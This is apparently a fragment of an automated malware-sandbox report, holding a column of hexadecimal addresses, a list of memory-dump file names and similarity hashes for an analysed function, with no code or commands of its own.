                                                                                                                                                                                                          0x020efd4a
                                                                                                                                                                                                          0x020efd21
                                                                                                                                                                                                          0x020fa3a1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020fa3a1
                                                                                                                                                                                                          0x020efd36
                                                                                                                                                                                                          0x0210200b
                                                                                                                                                                                                          0x02102012
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02102018
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02102018
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efd36
                                                                                                                                                                                                          0x020efe0f
                                                                                                                                                                                                          0x020efe16
                                                                                                                                                                                                          0x020fa3ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020fa3b3
                                                                                                                                                                                                          0x020fa3b3
                                                                                                                                                                                                          0x020efe1f
                                                                                                                                                                                                          0x0211ed25
                                                                                                                                                                                                          0x0211ed86
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed91
                                                                                                                                                                                                          0x0211ed95
                                                                                                                                                                                                          0x0211ed95
                                                                                                                                                                                                          0x0211ed9a
                                                                                                                                                                                                          0x0211edad
                                                                                                                                                                                                          0x0211edb3
                                                                                                                                                                                                          0x0211edba
                                                                                                                                                                                                          0x0211edc4
                                                                                                                                                                                                          0x0211edc9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211edcc
                                                                                                                                                                                                          0x0211ed2a
                                                                                                                                                                                                          0x0211ed55
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed61
                                                                                                                                                                                                          0x0211ed66
                                                                                                                                                                                                          0x0211ed6e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed7d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed7d
                                                                                                                                                                                                          0x0211ed30
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed3c
                                                                                                                                                                                                          0x0211ed43
                                                                                                                                                                                                          0x0211ed4b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3965848254-0
                                                                                                                                                                                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                          • Instruction ID: 9a4ca070c0ed9bbcf2bba79b13e41de82560de5028b8313f6a6d13296ce437e2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A391B031D0030AEEDF25DF98C8497EEBBB5EF45318F20807AD816A7691E7705A81DB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%